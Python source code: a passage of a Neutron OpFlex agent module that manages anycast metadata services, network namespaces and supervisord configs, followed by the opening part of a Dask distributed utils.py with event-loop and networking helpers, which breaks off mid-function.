fp = FileProcessor(
self.watchdir,
self.extensions,
self.eventq,
functools.partial(self.process))
fprun = functools.partial(fp.run)
self.processor = multiprocessing.Process(target=fprun)
LOG.debug("FileWatcher: %s: starting", self.name)
self.processor.start()
def action(self, event):
# event.maskname, event.filename
LOG.debug("FileWatcher: %(name)s: event: %(event)s",
{'name': self.name, 'event': event})
self.eventq.put(event)
def process(self, files):
# Override in child class
LOG.debug("FileWatcher: %(name)s: process: %(files)s",
{'name': self.name, 'files': files})
def terminate(self, signum, frame):
self.eventq.put(EOQ)
if signum is not None:
sys.exit(0)
def run(self):
signal.signal(signal.SIGINT, self.terminate)
signal.signal(signal.SIGTERM, self.terminate)
wm = pyinotify.WatchManager()
handler = EventHandler(watcher=self, extensions=self.extensions)
notifier = pyinotify.Notifier(wm, handler)
wm.add_watch(self.watchdir, handler.events, rec=False)
try:
LOG.debug("FileWatcher: %s: notifier waiting ...", self.name)
notifier.loop()
finally:
LOG.debug("FileWatcher: %s: notifier returned", self.name)
self.terminate(None, None)
LOG.debug("FileWatcher: %s: processor returned", self.name)
self.processor.join()
return True
class TmpWatcher(FileWatcher):
"""Class for integration testing"""
def __init__(self):
filedir = "/tmp"
extensions = EP_FILE_EXTENSION
super(TmpWatcher, self).__init__(
filedir, extensions, name="ep-watcher")
def process(self, files):
LOG.debug("TmpWatcher files: %s", files)
class EpWatcher(FileWatcher):
"""EpWatcher watches EPs and generates two state files:
anycast_services.state:
maps domain -> AS services for that domains
instance_networks.state:
maps IP -> neutron-network for each EP in that domain
anycast_services = {
'domain-uuid-1': {
'domain-name': domain_name,
'domain-policy-space': domain_tenant,
'next-hop-ip': anycast_svc_ip,
'uuid': domain_uuid
},
...
'domain-uuid-n': {
<anycast svc specification above>
}
}
instance_networks = {
'domain-uuid-1': {
'ip-addr-1': 'neutron-network',
...
'ip-addr-n': 'neutron-network'
},
'domain-uuid-n': {
'ip-addr-1': 'neutron-network',
...
'ip-addr-n': 'neutron-network'
}
}
"""
def __init__(self):
self.svcfile = "%s/%s" % (MD_DIR, STATE_FILENAME_SVC)
self.netsfile = "%s/%s" % (MD_DIR, STATE_FILENAME_NETS)
epfiledir = cfg.CONF.OPFLEX.epg_mapping_dir
epextensions = EP_FILE_EXTENSION
super(EpWatcher, self).__init__(
epfiledir, epextensions, name="ep-watcher")
def gen_domain_uuid(self, tenant, name):
fqname = '%s|%s' % (tenant, name)
fqhash = hashlib.md5(fqname.encode('utf-8')).hexdigest()
fquuid = str(uuid.UUID(fqhash))
return fquuid
def process(self, files):
LOG.debug("EP files: %s", files)
curr_svc = read_jsonfile(self.svcfile)
ip_pool = AddressPool(SVC_IP_BASE, SVC_IP_SIZE)
for domain_uuid in curr_svc:
thisip = netaddr.IPAddress(curr_svc[domain_uuid]['next-hop-ip'])
ip_pool.reserve(int(thisip))
new_svc = {}
new_nets = {}
updated = False
epfiledir = cfg.CONF.OPFLEX.epg_mapping_dir
for filename in os.listdir(epfiledir):
if not filename.endswith(EP_FILE_EXTENSION):
continue
filename = "%s/%s" % (epfiledir, filename)
ep = read_jsonfile(filename)
if ep:
metadata_optimization = ep.get(
'neutron-metadata-optimization',
False)
if metadata_optimization is False:
# No service file when metadata optimization is False,
# as for VMs on vlan type nets. But we can have another
# VM on an opflex type net on the same compute which can
# have metadata optimization, so we continue and a service
# file can be generated.
continue
domain_name = ep.get('domain-name')
domain_tenant = ep.get('domain-policy-space')
if domain_name is None or domain_tenant is None:
continue
domain_uuid = self.gen_domain_uuid(domain_tenant, domain_name)
if domain_uuid and domain_uuid not in new_svc:
if domain_uuid not in curr_svc:
updated = True
as_uuid = domain_uuid
as_addr = netaddr.IPAddress(ip_pool.get_addr())
as_addr = str(as_addr)
new_svc[domain_uuid] = {
'domain-name': domain_name,
'domain-policy-space': domain_tenant,
'next-hop-ip': as_addr,
'uuid': as_uuid,
}
else:
new_svc[domain_uuid] = curr_svc[domain_uuid]
del curr_svc[domain_uuid]
nnetwork = ep.get('neutron-network')
if nnetwork is None:
continue
ips = ep.get('anycast-return-ip')
if ips is None:
ips = []
if domain_uuid not in new_nets:
new_nets[domain_uuid] = {}
for ip in ips:
new_nets[domain_uuid][ip] = nnetwork
if curr_svc:
updated = True
if updated:
write_jsonfile(self.svcfile, new_svc)
write_jsonfile(self.netsfile, new_nets)
class StateWatcher(FileWatcher):
def __init__(self):
root_helper = cfg.CONF.AGENT.root_helper
self.mgr = AsMetadataManager(LOG, root_helper)
self.svcfile = "%s/%s" % (MD_DIR, STATE_FILENAME_SVC)
self.svc_ovsport_mac = self.mgr.get_asport_mac()[:17]
stfiledir = MD_DIR
stextensions = STATE_FILE_EXTENSION
super(StateWatcher, self).__init__(
stfiledir, stextensions, name="state-watcher")
def terminate(self, signum, frame):
self.mgr.ensure_terminated()
super(StateWatcher, self).terminate(signum, frame)
def process(self, files):
LOG.debug("State Event: %s", files)
curr_alloc = read_jsonfile(self.svcfile)
updated = False
asfiledir = cfg.CONF.OPFLEX.as_mapping_dir
for filename in os.listdir(asfiledir):
if not filename.endswith(AS_FILE_EXTENSION):
continue
filename = "%s/%s" % (asfiledir, filename)
asvc = read_jsonfile(filename)
if asvc:
domain_uuid = asvc["uuid"]
if domain_uuid not in curr_alloc:
updated = True
self.as_del(filename, asvc)
else:
if not self.as_equal(asvc, curr_alloc[domain_uuid]):
updated = True
self.as_write(curr_alloc[domain_uuid])
del curr_alloc[domain_uuid]
for domain_uuid in curr_alloc:
updated = True
self.as_create(curr_alloc[domain_uuid])
if updated:
self.mgr.update_supervisor()
def as_equal(self, asvc, alloc):
for idx in ["uuid", "domain-name", "domain-policy-space"]:
if asvc[idx] != alloc[idx]:
return False
if asvc["service-mapping"][0]["next-hop-ip"] != alloc["next-hop-ip"]:
return False
return True
def as_del(self, filename, asvc):
try:
self.mgr.del_ip(asvc["service-mapping"]["next-hop-ip"])
except Exception as e:
LOG.warn("EPwatcher: Exception in deleting IP: %s",
str(e))
proxyfilename = PROXY_FILE_NAME_FORMAT % asvc["uuid"]
proxyfilename = "%s/%s" % (MD_DIR, proxyfilename)
try:
os.remove(filename)
os.remove(proxyfilename)
except Exception as e:
LOG.warn("EPwatcher: Exception in deleting file: %s", str(e))
def as_create(self, alloc):
asvc = {
"uuid": alloc["uuid"],
"interface-name": SVC_OVS_PORT,
"service-mac": self.svc_ovsport_mac,
"domain-policy-space": alloc["domain-policy-space"],
"domain-name": alloc["domain-name"],
"service-mapping": [
{
"service-ip": "169.254.169.254",
"gateway-ip": "169.254.1.1",
"next-hop-ip": alloc["next-hop-ip"],
},
],
}
try:
self.mgr.add_ip(alloc["next-hop-ip"])
except Exception as e:
LOG.warn("EPwatcher: Exception in adding IP: %s",
str(e))
asfilename = AS_FILE_NAME_FORMAT % asvc["uuid"]
asfilename = "%s/%s" % (AS_MAPPING_DIR, asfilename)
write_jsonfile(asfilename, asvc)
proxyfilename = PROXY_FILE_NAME_FORMAT % asvc["uuid"]
proxyfilename = "%s/%s" % (MD_DIR, proxyfilename)
proxystr = self.proxyconfig(alloc)
try:
with open(proxyfilename, "w") as f:
f.write(proxystr)
pidfile = PID_FILE_NAME_FORMAT % asvc["uuid"]
self.mgr.sh("rm -f %s" % pidfile)
except Exception as e:
LOG.warn("EPwatcher: Exception in writing proxy file: %s",
str(e))
def proxyconfig(self, alloc):
duuid = alloc["uuid"]
ipaddr = alloc["next-hop-ip"]
proxystr = "\n".join([
"[program:opflex-ns-proxy-%s]" % duuid,
"command=ip netns exec of-svc "
"/usr/bin/opflex-ns-proxy "
"--metadata_proxy_socket=/var/lib/neutron/metadata_proxy "
"--state_path=/var/lib/neutron "
"--pid_file=/var/lib/neutron/external/pids/%s.pid "
"--domain_id=%s --metadata_host %s --metadata_port=80 "
"--log-dir=/var/log/neutron --log-file=opflex-ns-proxy-%s.log" % (
duuid, duuid, ipaddr, duuid[:8]),
"exitcodes=0,2",
"stopasgroup=true",
"startsecs=10",
"startretries=3",
"stopwaitsecs=10",
"stdout_logfile=NONE",
"stderr_logfile=NONE",
])
return proxystr
class SnatConnTrackHandler(object):
def __init__(self):
root_helper = cfg.CONF.AGENT.root_helper
self.mgr = AsMetadataManager(LOG, root_helper)
self.syslog_facility = cfg.CONF.OPFLEX.conn_track_syslog_facility
self.syslog_severity = cfg.CONF.OPFLEX.conn_track_syslog_severity
def conn_track_create(self, netns):
snatfilename = SNAT_FILE_NAME_FORMAT % netns
snatfilename = "%s/%s" % (MD_DIR, snatfilename)
conn_track_str = self.conn_track_config(netns)
try:
with open(snatfilename, "w") as f:
f.write(conn_track_str)
pidfile = PID_FILE_NAME_FORMAT % netns
self.mgr.sh("rm -f %s" % pidfile)
self.mgr.update_supervisor()
except Exception as e:
LOG.warn("ConnTrack: Exception in writing snat file: %s",
str(e))
def conn_track_del(self, netns):
snatfilename = SNAT_FILE_NAME_FORMAT % netns
snatfilename = "%s/%s" % (MD_DIR, snatfilename)
try:
os.remove(snatfilename)
self.mgr.update_supervisor()
except Exception as e:
LOG.warn("ConnTrack: Exception in deleting file: %s", str(e))
def conn_track_config(self, netns):
snatstr = "\n".join([
"[program:opflex-conn-track-%s]" % netns,
"command=/usr/bin/opflex-conn-track %s %s %s" % (
netns, self.syslog_facility, self.syslog_severity),
"exitcodes=0,2",
"stopasgroup=true",
"startsecs=10",
"startretries=3",
"stopwaitsecs=10",
"stdout_logfile=NONE",
"stderr_logfile=NONE",
])
return snatstr
class AsMetadataManager(object):
def __init__(self, logger, root_helper):
global LOG
LOG = logger
self.root_helper = root_helper
self.name = "AsMetadataManager"
self.md_filename = "%s/%s" % (MD_DIR, MD_SUP_FILE_NAME)
self.bridge_manager = opflexagent_utils.get_bridge_manager(
cfg.CONF.OPFLEX)
self.initialized = False
def init_all(self):
self.init_host()
self.init_supervisor()
self.start_supervisor()
return
def ensure_initialized(self):
if not self.initialized:
try:
self.clean_files()
self.init_all()
self.initialized = True
except Exception as e:
LOG.error("%(name)s: in initializing anycast metadata "
"service: %(exc)s",
{'name': self.name, 'exc': str(e)})
def ensure_terminated(self):
if self.initialized:
try:
self.initialized = False
self.clean_files()
self.stop_supervisor()
except Exception as e:
LOG.error("%(name)s: in shuttingdown anycast metadata "
"service: %(exc)s",
{'name': self.name, 'exc': str(e)})
def sh(self, cmd, as_root=True):
if as_root and self.root_helper:
cmd = "%s %s" % (self.root_helper, cmd)
LOG.debug("%(name)s: Running command: %(cmd)s",
{'name': self.name, 'cmd': cmd})
ret = ''
try:
sanitized_cmd = encodeutils.to_utf8(cmd)
data = subprocess.check_output(
sanitized_cmd, stderr=subprocess.STDOUT, shell=True)
ret = helpers.safe_decode_utf8(data)
except Exception as e:
LOG.error("In running command: %(cmd)s: %(exc)s",
{'cmd': cmd, 'exc': str(e)})
LOG.debug("%(name)s: Command output: %(ret)s",
{'name': self.name, 'ret': ret})
return ret
def write_file(self, name, data):
LOG.debug("%(name)s: Writing file: name=%(file)s, data=%(data)s",
{'name': self.name, 'file': name, 'data': data})
with open(name, "w") as f:
f.write(data)
def clean_files(self):
def rm_files(dirname, extension):
try:
for filename in os.listdir(dirname):
if filename.endswith('.' + extension):
os.remove("%s/%s" % (dirname, filename))
except Exception:
# Yes, one of those few cases, when a pass is OK!
pass
rm_files(AS_MAPPING_DIR, AS_FILE_EXTENSION)
rm_files(MD_DIR, STATE_FILE_EXTENSION)
rm_files(MD_DIR, PROXY_FILE_EXTENSION)
rm_files(MD_DIR, '.conf')
def start_supervisor(self):
self.stop_supervisor()
self.sh("supervisord -c %s" % self.md_filename)
def update_supervisor(self):
self.sh("supervisorctl -c %s reread" % self.md_filename)
self.sh("supervisorctl -c %s update" % self.md_filename)
def reload_supervisor(self):
self.sh("supervisorctl -c %s reload" % self.md_filename)
def stop_supervisor(self):
self.sh("supervisorctl -c %s shutdown" % self.md_filename)
time.sleep(30)
def add_default_route(self, nexthop):
self.sh("ip netns exec %s ip route add default via %s" %
(SVC_NS, nexthop))
def has_ip(self, ipaddr):
outp = self.sh("ip netns exec %s ip addr show dev %s" %
(SVC_NS, SVC_NS_PORT))
return 'inet %s' % (ipaddr, ) in outp
def add_ip(self, ipaddr):
if self.has_ip(ipaddr):
return
self.sh("ip netns exec %s ip addr add %s/%s dev %s" %
(SVC_NS, ipaddr, SVC_IP_CIDR, SVC_NS_PORT))
def del_ip(self, ipaddr):
if not self.has_ip(ipaddr):
return
self.sh("ip netns exec %s ip addr del %s/%s dev %s" %
(SVC_NS, ipaddr, SVC_IP_CIDR, SVC_NS_PORT))
def get_asport_mac(self):
return self.sh(
"ip netns exec %s ip link show %s | "
"gawk -e '/link\/ether/ {print $2}'" %
(SVC_NS, SVC_NS_PORT))
def init_host(self):
# Create required directories
self.sh("mkdir -p %s" % PID_DIR)
self.sh("rm -f %s/*.pid" % PID_DIR)
self.sh("chown %s %s" % (MD_DIR_OWNER, PID_DIR))
self.sh("chown %s %s/.." % (MD_DIR_OWNER, PID_DIR))
self.sh("mkdir -p %s" % MD_DIR)
self.sh("chown %s %s" % (MD_DIR_OWNER, MD_DIR))
# Create namespace, if needed
ns = self.sh("ip netns | grep %s ; true" % SVC_NS)
if not ns:
self.sh("ip netns add %s" % SVC_NS)
# Create ports, if needed
port = self.sh("ip link show %s 2>&1 | grep qdisc ; true" %
SVC_OVS_PORT)
if not port:
self.sh("ip link add %s type veth peer name %s" %
(SVC_NS_PORT, SVC_OVS_PORT))
self.sh("ip link set dev %s up" % SVC_OVS_PORT)
self.sh("ip link set %s netns %s" % (SVC_NS_PORT, SVC_NS))
self.sh("ip netns exec %s ip link set dev %s up" %
(SVC_NS, SVC_NS_PORT))
self.add_ip(SVC_IP_DEFAULT)
self.add_default_route(SVC_NEXTHOP)
self.sh("ethtool --offload %s tx off" % SVC_OVS_PORT)
self.sh("ip netns exec %s ethtool --offload %s tx off" %
(SVC_NS, SVC_NS_PORT))
self.bridge_manager.plug_metadata_port(self.sh, SVC_OVS_PORT)
def init_supervisor(self):
def conf(*fnames):
config_str = ''
for fname in fnames:
if os.path.exists(fname):
if os.path.isfile(fname):
config_str += '--config-file %s ' % fname
elif os.path.isdir(fname):
config_str += '--config-dir %s ' % fname
return config_str
config_str = "\n".join([
"[rpcinterface:supervisor]",
"supervisor.rpcinterface_factory = "
"supervisor.rpcinterface:make_main_rpcinterface",
"",
"[unix_http_server]",
"file = /var/lib/neutron/opflex_agent/md-svc-supervisor.sock",
"",
"[supervisorctl]",
"serverurl = "
"unix:///var/lib/neutron/opflex_agent/md-svc-supervisor.sock",
"prompt = md-svc",
"",
"[supervisord]",
"identifier = md-svc-supervisor",
"pidfile = /var/lib/neutron/opflex_agent/md-svc-supervisor.pid",
"logfile = /var/log/neutron/metadata-supervisor.log",
"logfile_maxbytes = 10MB",
"logfile_backups = 3",
"loglevel = debug",
"childlogdir = /var/log/neutron",
"umask = 022",
"minfds = 1024",
"minprocs = 200",
"nodaemon = false",
"nocleanup = false",
"strip_ansi = false",
"",
"[program:metadata-agent]",
"command=/usr/bin/neutron-metadata-agent " +
conf('/usr/share/neutron/neutron-dist.conf',
'/etc/neutron/neutron.conf',
'/etc/neutron/metadata_agent.ini',
'/etc/neutron/conf.d/neutron-metadata-agent') +
"--log-file /var/log/neutron/metadata-agent.log",
"exitcodes=0,2",
"stopasgroup=true",
"startsecs=10",
"startretries=3",
"stopwaitsecs=10",
"stdout_logfile=NONE",
"stderr_logfile=NONE",
"",
"[program:opflex-ep-watcher]",
"command=/usr/bin/opflex-ep-watcher " +
conf('/usr/share/neutron/neutron-dist.conf',
'/etc/neutron/neutron.conf',
'/etc/neutron/plugins/ml2/ml2_conf_cisco.ini') +
"--log-file /var/log/neutron/opflex-ep-watcher.log",
"exitcodes=0,2",
"stopasgroup=true",
"startsecs=10",
"startretries=3",
"stopwaitsecs=10",
"stdout_logfile=NONE",
"stderr_logfile=NONE",
"",
"[program:opflex-state-watcher]",
"command=/usr/bin/opflex-state-watcher " +
conf('/usr/share/neutron/neutron-dist.conf',
'/etc/neutron/neutron.conf',
'/etc/neutron/plugins/ml2/ml2_conf_cisco.ini') +
"--log-file /var/log/neutron/opflex-state-watcher.log",
"exitcodes=0,2",
"stopasgroup=true",
"startsecs=10",
"startretries=3",
"stopwaitsecs=10",
"stdout_logfile=NONE",
"stderr_logfile=NONE",
"",
"[include]",
"files = %s/*.proxy %s/*.snat" % (MD_DIR, MD_DIR),
])
config_file = "%s/%s" % (MD_DIR, MD_SUP_FILE_NAME)
self.write_file(config_file, config_str)
def init_env():
config.register_root_helper(cfg.CONF)
# importing ovs_config got OVS registered
cfg.CONF.register_opts(gbp_opts, "OPFLEX")
common_config.init(sys.argv[1:])
common_config.setup_logging()
config.setup_privsep()
utils.log_opt_values(LOG)
def tmp_watcher_main():
init_env()
TmpWatcher().run()
def ep_watcher_main():
init_env()
EpWatcher().run()
def state_watcher_main():
init_env()
StateWatcher().run()
def as_metadata_main():
init_env()
root_helper = cfg.CONF.AGENT.root_helper
asm = AsMetadataManager(LOG, root_helper)
asm.ensure_initialized()
if __name__ == "__main__":
tmp_watcher_main()
|
utils.py
|
import asyncio
import functools
import html
import importlib
import inspect
import json
import logging
import multiprocessing
import os
import pkgutil
import re
import shutil
import socket
import sys
import tempfile
import threading
import warnings
import weakref
import xml.etree.ElementTree
from asyncio import TimeoutError
from collections import OrderedDict, UserDict, deque
from concurrent.futures import CancelledError, ThreadPoolExecutor # noqa: F401
from contextlib import contextmanager, suppress
from hashlib import md5
from importlib.util import cache_from_source
from time import sleep
from typing import Any as AnyType
from typing import Dict, List
import tempfile
import click
import tblib.pickling_support
try:
import resource
except ImportError:
resource = None
import tlz as toolz
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from dask import istask
# Import config serialization functions here for backward compatibility
from dask.config import deserialize as deserialize_for_cli # noqa
from dask.config import serialize as serialize_for_cli # noqa
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa: F401
format_bytes,
format_time,
funcname,
parse_bytes,
parse_timedelta,
)
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
# For some reason this is required in python >= 3.9
if WINDOWS:
import multiprocessing.popen_spawn_win32
else:
import multiprocessing.popen_spawn_posix
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import optional_packages, required_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
# FIXME: this breaks if changed to async def...
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
"""Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with suppress(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
"""Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
"""Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
"""Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
callback_timeout = parse_timedelta(callback_timeout, "s")
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
# We flag the thread state asynchronous, which will make sync() call
# within `func` use async semantic. In order to support concurrent
# calls to sync(), `asynchronous` is used as a ref counter.
thread_state.asynchronous = getattr(thread_state, "asynchronous", 0)
thread_state.asynchronous += 1
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception:
error[0] = sys.exc_info()
finally:
assert thread_state.asynchronous > 0
thread_state.asynchronous -= 1
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
else:
self._loop = loop
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with suppress(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
"""Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return key_split(x)
elif typ is bytes:
return key_split_group(x.decode())
else:
return key_split(x)
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
